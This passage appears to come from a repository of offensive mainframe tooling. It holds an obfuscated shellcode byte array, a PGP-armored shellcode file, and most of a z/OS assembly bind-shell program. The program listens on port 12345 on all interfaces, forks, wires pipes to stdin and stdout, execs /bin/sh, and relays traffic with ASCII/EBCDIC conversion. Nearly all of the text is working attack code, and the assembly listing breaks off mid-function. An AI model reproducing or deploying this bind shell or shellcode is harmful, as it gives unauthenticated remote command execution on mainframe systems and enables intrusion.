"\x2a\xd4\x32\x94\x8d\xcf\xd4\x32\xee\x75\xd5\xd5\xd4\x34\xea\x5a" 75 | "\x2a\x2a\x2b\x0b\xee\x55\x2a\x2a\x2b\x30\xea\x5a\x2a\x2a\x2b\x3d" 76 | "\xee\x55\xd5\xd5\xd4\x3e\xea\x5a\x2a\x2a\x2a\xff\xee\x55\xd5\xd5" 77 | "\xd4\x3a\xea\x5a\x2a\x2a\x2b\x3d\xee\x55\xd5\xd5\xd4\x26\x8d\x12" 78 | "\x2a\x2f\x8d\x72\x2a\x2d\x8d\xcf\xd4\x33\x32\xc1\xee\x47\xd5\xd5" 79 | "\xd4\x2e\x32\xdc\xc6\x42\x2a\x80\xd5\x54\x2d\xd4\xee\xd7\x2a\x2a" 80 | "\x2a\xfa\x32\x94\x8d\xcf\xd7\xc2\xee\x75\x2a\x2a\x2a\xd4\xee\x05" 81 | "\x2a\x2a\x2a\xd7\xee\x45\x2a\x2a\x2a\xd6\xea\x5a\x2a\x2a\x2a\xdf" 82 | "\xee\x55\xd5\xd5\xd7\xc8\x30\x56\xee\x55\xd5\xd5\xd7\xca\x30\x56" 83 | "\xee\x55\xd5\xd5\xd7\xf4\x8d\x12\x2a\x2e\x8d\x72\x2a\x2c\x8d\xcf" 84 | "\xd7\xc7\x32\xc1\xee\x57\xd5\xd5\xd7\xfc\xc6\x52\x2a\x55\xd5\x54" 85 | "\x2d\xd4\xee\xd7\x2a\x2a\x2a\x8d\x32\x94\x8d\xcf\xd7\x97\xea\x5a" 86 | "\x2a\x2a\x2a\xf3\xee\x55\xd5\xd5\xd7\xea\x30\x56\xee\x55\xd5\xd5" 87 | "\xd7\x94\x8d\x12\x2a\x29\x8d\x72\x2a\x2f\x8d\xcf\xd7\xe5\xee\x47" 88 | "\xd5\xd5\xd7\x9d\x8d\xd2\x2a\x49\xc6\x42\x2a\x4a\xd5\x54\xee\x77" 89 | "\x2a\x2a\x2a\xeb\xee\x47\x2a\x2a\x2a\xea\x32\xc1\x2d\xd4\xea\x3a" 90 | "\x2a\x2a\x2a\x83\xee\x67\x2a\x2a\x2a\x84\x8d\xa2\x2a\x3f\xea\x0a" 91 | "\x2a\x2a\x2a\xeb\x3d\x4c\xc9\x1a\x3a\x2a\x2a\x5c\xea\x11\x2a\x2a" 92 | "\x2a\xd5\x33\x12\x8d\x5e\x2a\x22\x8d\x72\x2a\xaf\x68\x7a\x3a\x2a" 93 | "\x8d\xde\x2a\x25\xc9\x7a\x0a\x2a\x2a\x5c\xea\x71\x2a\x2a\x2a\xd5" 94 | "\x30\x43\x30\x03\x33\x1f\x8d\x5e\xd5\xdd\x68\x4a\x3a\x2a\x30\x33" 95 | "\x31\x63\x8d\x5e\xd5\xf4\x2d\xd4\xee\x67\x2a\x2a\x2a\xae\xea\x3a" 96 | "\x2a\x2a\x2a\x53\x8d\xa2\x2a\xaf\xea\x0a\x2a\x2a\x2a\xbe\x31\x03" 97 | "\xc9\x1a\x3a\x2a\x2a\x5c\xea\x11\x2a\x2a\x2a\xd5\x33\x12\x8d\x5e" 98 | "\x2a\x2c\x8d\x12\x2a\x4f\x8d\xde\x2a\x23\x30\x09\xc9\x1a\x0a\x2a" 99 | "\x2a\x5c\xea\x11\x2a\x2a\x2a\xd5\x68\x1a\x3a\x2a\x30\x33\x31\x63" 100 | "\x8d\x5e\xd5\xce\x2d\xd4\x3d\xd5\xea\x6a\x2a\x2a\x2a\x3a\x7a\xda" 101 | "\x6a\x2a\x72\xfa\x6a\x2e\xb2\xc6\xfa\x26\xea\x6a\x2a\x2a\x2a\x2d" 102 | "\x72\xda\x6a\x2a\x2d\xd4\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a" 103 | "\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2b\x2a\x2a\x2a\x28\x2b\x79\x19\x96" 104 | "\x2b\x79\x19\x8e\x2b\x79\x1d\x3a\x2b\x79\x1c\x1c\x2b\x79\x1c\x42" 105 | "\x2b\x79\x1c\x0e\x2b\x79\x19\x34\x2b\x79\x19\xa0\x2b\x79\x18\x66" 106 | "\x2b\x79\x19\x2c\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x3a\x2a\x2a\x2a\x2a" 107 | "\x2a\x2a\x2a\x2a\x3a\x28\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a" 108 | "\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2d\x4b\xa8\xa3\xbf\x4b\x88\xa2\x2a" 109 | "\x2a\x2a\x2a\x2b\x2a\x2a\x2a\x28\x2a\x2a\x2a\x2a\x88\xa2\x2a\x2a" 110 | "\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x3a" 111 | "\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08" 112 | "\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a" 113 | "\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a" 114 | "\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x28\x28\x1a\x13\x2a\x2a\x2a\x2a" 115 | "\x01\x02\x03\x9c\x09\x86\x7f\x97\x8d\x8e\x0b\x0c\x0d\x0e\x0f\x10" 116 | "\x11\x12\x13\x9d\x0a\x08\x87\x18\x19\x92\x8f\x1c\x1d\x1e\x1f\x80" 117 | "\x81\x82\x83\x84\x85\x17\x1b\x88\x89\x8a\x8b\x8c\x05\x06\x07\x90" 118 | "\x91\x16\x93\x94\x95\x96\x04\x98\x99\x9a\x9b\x14\xff\x9e\x1a\x20" 119 | "\xa0\xe2\xe4\xe0\xe1\xe3\xe5\xe7\xf1\xa2\x2e\x3c\x28\x2b\x7c\x26" 120 | "\xe9\xea\xeb\xe8\xed\xee\xef\xec\xdf\x21\x24\x2a\x29\x3b\x5e\x2d" 121 | "\x2f\xc2\xc4\xc0\xc1\xc3\xc5\xc7\xd1\xa6\x2c\x25\x5f\x3e\x3f\xf8" 122 | "\xc9\xca\xcb\xc8\xcd\xce\xcf\xcc\x60\x3a\x23\x40\x27\x3d\x22\xd8" 123 | "\x61\x62\x63\x64\x65\x66\x67\x68\x69\xab\xbb\xf0\xfd\xfe\xb1\xb0" 124 | "\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\xaa\xba\xe6\xb8\xc6\xa4\xb5" 125 | "\x7e\x73\x74\x75\x76\x77\x78\x79\x7a\xa1\xbf\xd0\x5b\xde\xae\xac" 126 | "\xa3\xa5\xb7\xa9\xa7\xb6\xbc\xbd\xbe\xdd\xa8\xaf\x5d\xb4\xd7\x7b" 127 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\xad\xf4\xf6\xf2\xf3\xf5\x7d" 128 | "\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\xb9\xfb\xfc\xf9\xfa\xff\x5c" 129 | "\xf7\x53\x54\x55\x56\x57\x58\x59\x5a\xb2\xd4\xd6\xd2\xd3\xd5\x30" 130 | "\x31\x32\x33\x34\x35\x36\x37\x38\x39\xb3\xdb\xdc\xd9\xda\x9f"; 131 | -------------------------------------------------------------------------------- /bind-shell/sb_shellcode.txt.asc: -------------------------------------------------------------------------------- 1 | -----BEGIN PGP MESSAGE----- 2 | Comment: GPGTools - https://gpgtools.org 3 | 4 | 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 40 | 6+PiPBdv9qj4T67/oxaLESlveJQRAxC2bwrXi2oJ3AqSTNnRCQ5nAMNHTGpacg1Z 41 | cYT2LLUhTZ8woRlwpsIbQVSFJCM22ymh/ojZJw01CI2XJ4gCOWdCh6E5+DJuQbIJ 42 | FeCq4oQTXGRUGkOdrySIMqYCHXoiCBLKjJodtq9YltRmKBV1MhEBo1NhujoEgd1n 43 | 6hW21IFgSXAMgSApZmuE469HPgPPHK5xH8AEBsVQ5kChAXWNBokE3LL1ZCW1aM25 44 | S47P9IgSyozRgkYMUQvqGyGMQ5m0ytkRIDzpKMxHgNAV/VGEOLJWFG/WDXlyBEVo 45 | sSGVMw5Aw6ZwOZL7afC5BIE6f57QuYpMMcfZkdM5mnPtGz0jpaiehRQXRSm0qlXU 46 | HwKoiCALRIaY4xjmHhmCAcnJlmm3aGhV0OFQoc9MwQHSWjT0kI8jXEddB+m9LMgh 47 | 4shBXwTuBi04tBpMcxgXde/gjSpNqiT6HdSOVjkVJBT3kBFfGM+lYTJ8SylClFTv 48 | TGMKChGmoN6NLCDNKepDMonAETUdxBxdTlkiQly0rrmUjsgF/hAhGlotqArgZM/A 49 | dExxN3pInaJYHNVIHJKwUm5DonaJ0AThKAJjBMkI41GQyErKQXC+4pBEXtJwKmxi 50 | jagPlBCWmgMfJzp+odIouRpbUgWpUZR4NSWdwWW34y0LKxtfs2nDxoUNF778ghvP 51 | 7FzdsHDxpTcdO3voiov2bvvQnZv/dcf+F5bVI/tX1Q+P3/77f976hbsuuXjz4qGF 52 | a/9y5Z8efuWH7z/560f/8dbDD57Y+unFN5VPHjy++Nldf/juizff9fAFD77rN9me 53 | dyyKLYvvfm51d1UdPrDyu6P3HPzioWeKex87ff1TP/7qqe8dXPnFIyee3bRwXfbM 54 | m7dd+ES1d2n73bd85/IbDjebX3/2VX9buuMjnzt52VVPHbm/XP3Y0+JLb39D+8Zd 55 | 9724ZWvz16c/tXrqygOvuHsledv2xYPvv+baW159pPryrucX9733hfft3vKzbz5w 56 | 9fXHzv3o6OV/PnLmsV+e235de+L5T55+4J6TBx56z09/9f2ffP3E58++c+VIe9VX 57 | Dv/21g8++e1v3Pns8n2bPvDRq791/PTfzz332nt/sPvUzx96fOtl/wY= 58 | =exjH 59 | -----END PGP MESSAGE----- 60 | -------------------------------------------------------------------------------- /bind-shell/shell_bind.s: -------------------------------------------------------------------------------- 1 | TITLE 'bind shell for mainframe/system Z' 2 | BINDSH CSECT 3 | BINDSH AMODE 31 4 | BINDSH RMODE ANY 5 | *********************************************************************** 6 | * * 7 | * @SETUP registers and save areas * 8 | * * 9 | *********************************************************************** 10 | @SETUP DS 0F # full word boundary 11 | STM 14,12,12(13) # save our registers 12 | LARL 15,@SETUP # base address into R15 13 | LR 8,15 # copy R15 to R8 14 | USING @SETUP,8 # R8 for addressability throughout 15 | LARL 11,SAVEAREA # sa address 16 | ST 13,4(,11) # save callers save area 17 | LR 13,11 # R13 to our save area 18 | DS 0H # halfword boundaries 19 | 20 | *********************************************************************** 21 | * * 22 | * @LOADFS - load all the functions we need * 23 | * for SC loop this * 24 | * * 25 | *********************************************************************** 26 | @LOADFS L 2,FFUNC # first function we use 27 | LHI 3,8 # used for our index 28 | L 4,NUMFUNC # number of functions to load 29 | @LDLOOP LR 0,2 # load string of func name 30 | XR 1,1 # clear R1 31 | SVC 8 # perform LOAD 32 | XC 0(8,2),0(2) # clear current Func space 33 | ST 0,0(0,2) # store addr in func space 34 | AR 2,3 # increment R2 by 8 35 | AHI 4,-1 # decrement R4 36 | CIB 4,0,2,@LDLOOP # compare R4 with 0,if GT loop 37 | 38 | *********************************************************************** 39 | * * 40 | * BPX1SOC set up socket - inline * 41 | * * 42 | *********************************************************************** 43 | LSOCK L 15,BSOC # load func addr to 15 44 | CALL (15),(DOM,TYPE,PROTO,DIM,SRVFD, x 45 | RTN_VAL,RTN_COD,RSN_COD),VL 46 | ******************************* 47 | * chk return code, 0 or exit * 48 | ******************************* 49 | LHI 15,2 50 | L 6,RTN_VAL 51 | CIB 6,0,7,EXITP # R6 not 0? Time to exit 52 | 53 | *********************************************************************** 54 | * * 55 | * BPC1BND (bind) bind to socket - inline * 56 | * * 57 | *********************************************************************** 58 | LBIND L 15,BBND # load func addr to 15 59 | LA 5,SRVSKT # addr of our socket 60 | USING SOCKADDR,5 # layout sockaddr over R5 61 | XC SOCKADDR(16),SOCKADDR # zero sock addr struct 62 | MVI SOCK_FAMILY,AF_INET # family inet 63 | MVI SOCK_LEN,SOCK#LEN # len of socket 64 | MVC SOCK_SIN_PORT,LISTSOCK # list on PORT 12345 65 | MVC SOCK_SIN_ADDR,LISTADDR # listen on 0.0.0.0 66 | DROP 5 67 | CALL (15),(SRVFD,SOCKLEN,SRVSKT, x 68 | RTN_VAL,RTN_COD,RSN_COD),VL 69 | ******************************* 70 | * chk return code, 0 or exit * 71 | ******************************* 72 | LHI 15,3 73 | L 6,RTN_VAL 74 | CIB 6,0,7,EXITP # R6 not 0? Time to exit 75 | 76 | *********************************************************************** 77 | * * 78 | * BPX1LSN (listen) listen on created socket - inline * 79 | * * 80 | *********************************************************************** 81 | LLIST L 15,BLSN # load func addr to 15 82 | CALL (15),(SRVFD,BACKLOG, x 83 | RTN_VAL,RTN_COD,RSN_COD),VL 84 | ******************************* 85 | * chk return code, 0 or exit * 86 | ******************************* 87 | LHI 15,4 88 | L 6,RTN_VAL 89 | CIB 6,0,7,EXITP # R6 not 0? Time to exit 90 | 91 | *********************************************************************** 92 | * * 93 | * BPX1ACP (accept) - accept conn from socket - inline * 94 | * * 95 | *********************************************************************** 96 | LACPT L 15,BACP # load func addr to 15 97 | LA 5,CLISKT # addr of our socket address 98 | USING SOCKADDR,5 # set up addressing for sock struct 99 | XC SOCKADDR(8),SOCKADDR #zero sock addr struct 100 | MVI SOCK_FAMILY,AF_INET 101 | MVI SOCK_LEN,(SOCK#LEN+SOCK_SIN#LEN) 102 | DROP 5 103 | CALL (15),(SRVFD,CLILEN,CLISKT, x 104 | CLIFD,RTN_COD,RSN_COD),VL 105 | **************************************************** 106 | * chk return code here anything but -1 is ok * 107 | **************************************************** 108 | LHI 15,5 109 | L 6,CLIFD 110 | CIB 6,-1,8,EXITP # R6 = -1? Time to exit 111 | 112 | *********************************************************************** 113 | * * 114 | * Create pipes to be used to communicate with child proc * 115 | * that will be created in upcoming forking * 116 | * * 117 | *********************************************************************** 118 | @CPIPES BRAS 14,LPIPE # get FDs for child proc 119 | @CFD ST 5,CFDR # store child read fd 120 | ST 6,CFDW # store child write fd 121 | @CPIPE2 BRAS 14,LPIPE 122 | @PFD ST 5,PFDR # store parent read fd 123 | ST 6,PFDW # store parent write fd 124 | 125 | *********************************************************************** 126 | * * 127 | * BP1FRK (FORK) fork a child process * 128 | * * 129 | *********************************************************************** 130 | LFORK L 15,BFRK # load func addr to 15 131 | CALL (15),(CPROCN,RTN_COD,RSN_COD),VL 132 | BRAS 0,@PREPCHL 133 | **************************************************** 134 | * chk return code here anything but -1 is ok * 135 | **************************************************** 136 | LHI 15,1 # load 1 for RC / Debugging 137 | L 6,CPROCN # locad Ret val in R6 138 | CIB 6,-1,8,EXITP # compare R6 to -1 and jump if eq 139 | 140 | **************************************************** 141 | * prepare the child process for exec , only runs * 142 | * if CPROCN (child pid from fork) equals 0 * 143 | **************************************************** 144 | @PREPCHL L 2,CPROCN # load child proc # to R2 145 | CIB 2,0,7,@PREPPAR # R2 not 0? We are parent, move on 146 | 147 | ************************************************* 148 | * order of things to prep child pid * 149 | * 0) Close parent write fd * 150 | * 1) Close child read fd * 151 | * 2) dupe parent read fd to std input * 152 | * 3) dupe child write fd to std output * 153 | * 4) dupe child write fd to std err * 154 | * 5) Close parent read fd * 155 | * 6) Close child write fd * 156 | * 7) exec /bin/sh * 157 | ************************************************* 158 | LA 2,F_CLOSFD 159 | L 5,PFDW # load R5 with pfdw 160 | L 6,PFDW # load R5 with pfdw 161 | @PRC0 BRAS 14,LFCNTL # call close 162 | LA 2,F_CLOSFD 163 | L 5,CFDR # load R5 with cfdr 164 | L 6,CFDR # load R5 with cfdr 165 | BRAS 14,LFCNTL # call close 166 | LA 2,F_DUPFD2 # gonna do a dup2 167 | L 5,PFDR # parent read fd 168 | LGFI 6,0 # std input 169 | BRAS 14,LFCNTL # call dupe2 170 | LA 2,F_DUPFD2 # gonna do a dup2 171 | L 5,CFDW # child write fd 172 | LGFI 6,1 # std output 173 | BRAS 14,LFCNTL # call dupe2 174 | LA 2,F_DUPFD2 # gonna do a dup2 175 | L 5,CFDW # child write fd 176 | LGFI 6,2 # std error 177 | BRAS 14,LFCNTL # call dupe2 178 | LA 2,F_CLOSFD 179 | L 5,PFDR # load R5 with pfdr 180 | L 6,PFDR # load R5 with pfdr 181 | BRAS 14,LFCNTL # call close 182 | LA 2,F_CLOSFD 183 | L 5,CFDW # load R5 with cfdw 184 | L 6,CFDW # load R5 with cfdw 185 | BRAS 14,LFCNTL # call close 186 | 187 | *********************************************************************** 188 | * * 189 | * BP1EXC (EXEC) execute shell '/bin/sh' * 190 | * * 191 | *********************************************************************** 192 | LEXEC L 15,BEXC # load func addr to 15 193 | CALL (15),(EXCMDL,EXCMD,EXARGC,EXARGLL,EXARGL, x 194 | EXENVC,EXENVLL,EXENVL, x 195 | EXITRA,EXITPLA, x 196 | RTN_VAL,RTN_COD,RSN_COD),VL 197 | BRAS 0,GOODEX # exit child proc after exec 198 | 199 | **************************************************** 200 | * prepare the parent process to speak with child * 201 | * order of things to prep parent pid * 202 | * 0) close parent fd read * 203 | * 1) close child fd write * 204 | * 2) socket,bind,accept,listen,read & write * 205 | * 3) set client socked and child fd write * 206 | * to non_blocking * 207 | **************************************************** 208 | @PREPPAR LA 2,F_CLOSFD 209 | L 5,PFDR # load R5 with pfdr 210 | L 6,PFDR # load R5 with pfdr 211 | BRAS 14,LFCNTL # call close 212 | LA 2,F_CLOSFD 213 | L 5,CFDW # load R5 with cfdw 214 | L 6,CFDW # load R5 with cfdw 215 | BRAS 14,LFCNTL # call close 216 | 217 | **************************************************** 218 | * Set clifd and child fd read to non_blocking * 219 | **************************************************** 220 | LA 2,F_GETFL # get file status flags 221 | L 5,CLIFD # client sock fd 222 | XR 6,6 # for getfd, arg is 0 223 | BRAS 14,LFCNTL # call dupe2 224 | LA 5,O_NONBLOCK # add non-blocking flag 225 | OR 7,5 # or to add the flag to R7 226 | LA 2,F_SETFL # set file status flags 227 | L 5,CLIFD # client sock fd 228 | LR 6,7 # put new flags in R6 229 | BRAS 14,LFCNTL # call dupe2 230 | LA 2,F_GETFL # get file status flags 231 | L 5,CFDR # child fd read 232 | XR 6,6 # for getfd, arg is 0 233 | BRAS 14,LFCNTL # call dupe2 234 | LA 5,O_NONBLOCK # add non-blocking flag 235 | OR 7,5 # or to add the flag to R7 236 | LA 2,F_SETFL # set file status flags 237 | L 5,CFDR # child fd read 238 | LR 6,7 # put new flags in R6 239 | BRAS 14,LFCNTL # call dupe2 240 | *********************************************************************** 241 | * * 242 | * Main read from client socket looop starts here * 243 | * * 244 | *********************************************************************** 245 | @READCLI L 5,CLIFD # read from CLIFD 246 | LA 7,@READCFD # Nothing read, return to here 247 | BRAS 14,LREAD # Brach to read function 248 | 249 | ******************************* 250 | * CALL A2E * 251 | * change CLIBUF from * 252 | * ASCII to EBCDIC * 253 | ******************************* 254 | BRAS 14,CONVAE # call e2a func 255 | L 5,PFDW # write to child process fd 256 | BRAS 14,LWRITE # call write function 257 | 258 | *********************************************************************** 259 | * * 260 | * Read from child fd loop starts here * 261 | * * 262 | *********************************************************************** 263 | @READCFD L 5,CFDR # read from child fd 264 | LA 7,@READCLI # nothing read, back to socket read 265 | BRAS 14,LREAD # Branch to read function 266 | 267 | ******************************* 268 | * CALL E2A * 269 | * change CLIBUF from * 270 | * ebcdic to ASCII * 271 | ******************************* 272 | BRAS 14,CONVEA # call e2a func 273 | L 5,CLIFD # write to client socked fd 274 | BRAS 14,LWRITE # call write function 275 | 276 | ******************************************************** 277 | * Functions beyond this point, no more inline * 278 | * execution beyond here should occur * 279 | ******************************************************** 280 | *********************************************************************** 281 | * * 282 | * BPX1RED (read) - function * 283 | * R5 has file descriptor to read from * 284 | * R7 has nothing read address * 285 | * R14 has good read return address * 286 | * * 287 | *********************************************************************** 288 | LREAD L 15,BRED # load func addr to 15 289 | ST 5,@TRFD # file descriptor we are reading 290 | ST 7,@NRA # no bytes read: return address 291 | ST 14,SAVEAREA # bytes read: return address 292 | XR 1,1 # clear R1 293 | ST 1,BREAD # clear Bytes Read 294 | L 5,CLIBUF # clibuf addr 295 | XC 0(52,5),0(5) # 0 out cli buf 296 | BRAS 0,@CRED # jump to call 297 | DS 0F 298 | @TRFD DC 4XL1'0' # temp var for rd to read 299 | @NRA DC 4XL1'0' # temp var for not read ret addr 300 | @CRED CALL (15),(@TRFD,CLIBUF,ALET,CLIREAD, x 301 | BREAD,RTN_COD,RSN_COD),VL 302 | DS 0H 303 | **************************************************** 304 | * chk return code here anything but -1 is ok * 305 | * for non-blocking fd's we have to check * 306 | * both the return val and code to make sure * 307 | * it didn't fail just b/c non-blocking and no * 308 | * data available vs just a read error * 309 | **************************************************** 310 | L 14,SAVEAREA # bytes read RA 311 | L 7,@NRA # no bytes read RA 312 | LHI 15,6 # exit code for this function 313 | L 6,BREAD # bytes read (aka rtn val) 314 | CIB 6,0,2,0(14) # bytes read, process them 315 | CIB 6,0,8,0(7) # OK rtn code, on to nobyte read 316 | L 6,RTN_COD # load up return code 317 | LA 1,EWOULDBLOCK # load up the non-blocking RTNCOD 318 | LA 2,EAGAIN # load up the other OK nblck RTNCOD 319 | CRB 6,1,8,0(7) # OK rtn code, on to nobyte read 320 | CRB 6,2,8,0(7) # OK rtn code, on to nobyte read 321 | BRAS 0,EXITP # -1 and not due to blocking, exit 322 | 323 | *********************************************************************** 324 | * * 325 | * BPX1WRT (WRITE) - function * 326 | * R5 has file descriptor to read from * 327 | * * 328 | *********************************************************************** 329 | LWRITE L 15,BWRT # load func addr to 15 330 | ST 5,@TWFD # store fd in temp fd 331 | ST 14,SAVEAREA # save return address 332 | BRAS 0,@CWRT # jump to write 333 | @TWFD DC A(*) # temp holder for fd 334 | @CWRT CALL (15),(@TWFD,CLIBUF,ALET,BREAD, x 335 | BWRIT,RTN_COD,RSN_COD),VL 336 | ************************************************************** 337 | * chk return code here anything but neg 1 is ok * 338 | * exit if a match (8) * 339 | ************************************************************** 340 | L 14,SAVEAREA # restore return address 341 | LHI 15,9 # exit code for this func 342 | L 6,BWRIT # set r6 to rtn val 343 | CIB 6,-1,8,EXITP # exit if R6 = -1 344 | BCR 15,14 # back to return address 345 | 346 | *********************************************************************** 347 | * * 348 | * BPX1FCT (fcntl) edit file descriptor * 349 | * for dup2 set R2=F_DUPFD2 * 350 | * R5=fd to modify R6=fd to set R5 equal to * 351 | * equivalent to dupe2(R5,R6) * 352 | * for read flags, set R2=F_GETFL * 353 | * R5=fd, R6=0, R7=rtn flags * 354 | * for write flags, set R2=F_SETFL * 355 | * R5=fd, R6= R7=0 * 356 | * for close, set R2=F_CLOSFD * 357 | * R5=R6 = fd to close (optionally R5 & R6 can be a range * 358 | * of FDs to close) * 359 | * * 360 | *********************************************************************** 361 | LFCNTL L 15,BFCT # load func addr to 15 362 | ST 14,SAVEAREA # save return address 363 | ST 5,@FFD # fd to be duplicated 364 | ST 2,@ACT # action field for BPX1FCT 365 | ST 6,@ARG # r6 should have the biggest fd 366 | BRAS 0,@FCTL 367 | @FFD DC F'0' 368 | @ACT DC F'0' 369 | @ARG DC F'0' 370 | @RETFD DC F'0' 371 | @FCTL CALL (15),(@FFD,@ACT,@ARG,@RETFD,RTN_COD,RSN_COD),VL 372 | **************************************************** 373 | * chk return code here anything but -1 is ok * 374 | **************************************************** 375 | LHI 15,11 # exit code for this func 376 | L 7,@RETFD # set r6 to rtn val 377 | CIB 7,-1,8,EXITP # r6 = -1 exit 378 | L 14,SAVEAREA # reload ret address 379 | BCR 15,14 # return to caller 380 | 381 | *********************************************************************** 382 | * * 383 | * BPX1PIP (pipe) create pipe - no input * 384 | * returns: R5=read fd R6=write fd * 385 | * * 386 | *********************************************************************** 387 | LPIPE L 15,BPIP # load func addr to 15 388 | ST 14,SAVEAREA # save return address 389 | BRAS 0,@PIP 390 | @RFD DC F'0' # read file desc 391 | @WFD DC F'0' # write file desc 392 | @PIP CALL (15),(@RFD,@WFD,RTN_VAL,RTN_COD,RSN_COD),VL 393 | **************************************************** 394 | * chk return code here anything but -1 is ok * 395 | **************************************************** 396 | LHI 15,12 # exit code for this func 397 | L 6,BWRIT # set r6 to rtn val 398 | CIB 6,-1,8,EXITP 399 | L 5,@RFD # load R5 with read fd 400 | L 6,@WFD # load R6 with write fd 401 | L 14,SAVEAREA # reload ret address 402 | BCR 15,14 # return to caller 403 | 404 | *********************************************************************** 405 | * * 406 | * CONVAE - convert CLIBUF ascii to ebcdic * 407 | * function looks up ascii byte and returns ebcdic * 408 | * expects return address in R14 * 409 | * * 410 | *********************************************************************** 411 | CONVAE LHI 6,1 # R6 has number 1 412 | L 4,BREAD # num of bytes read 413 | L 1,CLIBUF # address of cli sock input 414 | LOOP1 L 2,A2E # address of a2e buff 415 | SR 2,6 # subtract 1 from R2 addr 416 | LB 3,0(0,1) # Load byte from cli into R3 417 | NILF 3,X'FF' # make sure R3 is 1 positive byte 418 | AR 2,3 # add ascii val to a2e buff 419 | LB 3,0(0,2) # load byte from a2e buff into R3 420 | NILF 3,X'FF' # make sure R3 is 1 positive byte 421 